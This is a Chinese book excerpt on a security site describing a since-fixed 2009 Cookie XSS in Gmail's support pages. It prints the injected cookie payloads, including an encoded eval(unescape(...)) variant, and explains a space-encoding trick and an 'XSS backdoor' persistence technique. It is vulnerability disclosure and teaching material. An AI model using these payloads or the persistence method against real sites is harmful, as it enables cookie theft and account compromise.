频道栏目
读书频道 > 安全 > Web前端黑客技术揭秘
6.8 其他案例分享——Gmail Cookie XSS
2013-01-23 14:04:45     我来说两句
收藏   我要投稿

本文所属图书 > Web前端黑客技术揭秘

Web 前端的黑客攻防技术是一门非常新颖且有趣的黑客技术,主要包含Web 前端安全的跨站脚本(XSS)、跨站请求伪造(CSRF)、界面操作劫持这三大类,涉及的知识点涵盖信任与信任关系、Cookie安全、Flash 安全、...  立即去当当网订购

FireCookie是Firefox浏览器扩展FireBug的一个插件,专门用于Cookie的各种操作,非常方便。

本书的第二作者xisigr在2009年发现https://mail.google.com/support中存在一个Cookie XSS漏洞,当时用FireCookie进行编辑,把gmail_kimt_exp值改为:
')</script><script>alert(document.cookie)</script>

然后打开http://mail.google.com/support路径下的任何一个页面,查看HTTP源代码,发现嵌入了如下代码:
<script type="text/javascript">
urchinTracker('/support/?hl=en&experiment=')</script><script>alert(document.cookie)</script>');
</script>

漏洞成因是Gmail的Cookie参数gmail_kimt_exp不进行任何过滤就直接输出到页面中,导致出现XSS漏洞。这里要说明的是,Cookie参数值中不允许有空格存在,所以你在需要用到空格的时候要进行编码,比如:
gmail_kimt_exp=')</script><script>
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6E%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))
</script>

这个漏洞通知Google后已经修复,对特殊字符进行过滤:
<script type="text/javascript">
urchinTracker('/support/?hl=cn&experiment=\x27)\x3C\x2Fscript\x3E\x3Cscript\x3Ealert(1)\x3C\x2Fscript\x3E');
</script>

 题外话:

这个Cookie XSS的价值在哪里?

实际上,如果仅仅是Cookie XSS本身几乎是没价值的,因为攻击者很难事先改写你的Cookie。但是如果结合Gmail的其他XSS,比如一个反射型XSS,这个Cookie XSS的价值就可以发挥出来了。攻击者可以通过这个反射型XSS将Payload写到Cookie中,只要Cookie不清除,即使反射型XSS被修补了,那么每次用户进入Gmail的时候,Cookie XSS都可以触发,这就留下了一个后门,我们把这个叫做XSS Backdoor。

您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力  
上一篇:6.7.7 更多经典的混淆CheckList
下一篇:雷神的微软平台安全宝典
相关文章
图文推荐
排行
热门
最新书评
特别推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站